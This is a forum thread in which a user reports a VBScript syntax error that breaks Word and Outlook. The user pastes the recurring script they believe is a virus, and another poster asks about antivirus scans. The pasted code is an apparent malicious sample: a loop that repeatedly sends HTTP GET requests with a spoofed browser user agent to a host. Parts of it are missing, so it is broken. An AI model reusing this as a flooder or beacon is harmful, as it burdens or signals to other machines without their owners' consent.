i am getting a syntax error code 800 A03EA vb script error that has stopped Word from opening any documents and has caused outlook to stop--any ideas on how to correct these errors--Microsoft help--is no help
tom9698
it started on the 29th of June--I think it is a virus because when I deleted it--it came back here is what it looks like:
On Error Resume Next
set wsTCP=CreateObject("oswinsck.TCP")
Head = "GET " & "
& " HTTP/1.0" & vbCrLf & "Accept: */*" & vbCrLf & "User-Agent: " & "Mozilla/4.0 (compatible; MSIE 6.0; Win32)" & vbcrlf & "Host: 192.168.1.101" & vbCrLf & vbCrLf
Do
If wsTCP.Connect("", ) = 0 Then
wsTCP.SendData Head
wsTCP.Disconnect
End If
loop
I'm trying to get rid of it
any ideas?
tom
Oh-oh. Hmmmm. Is your AV software up to date? Have you tried to specifically scan that file? When you delete it, does it show as deleted, then reappear?
This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
By continuing to use this site, you are consenting to our use of cookies.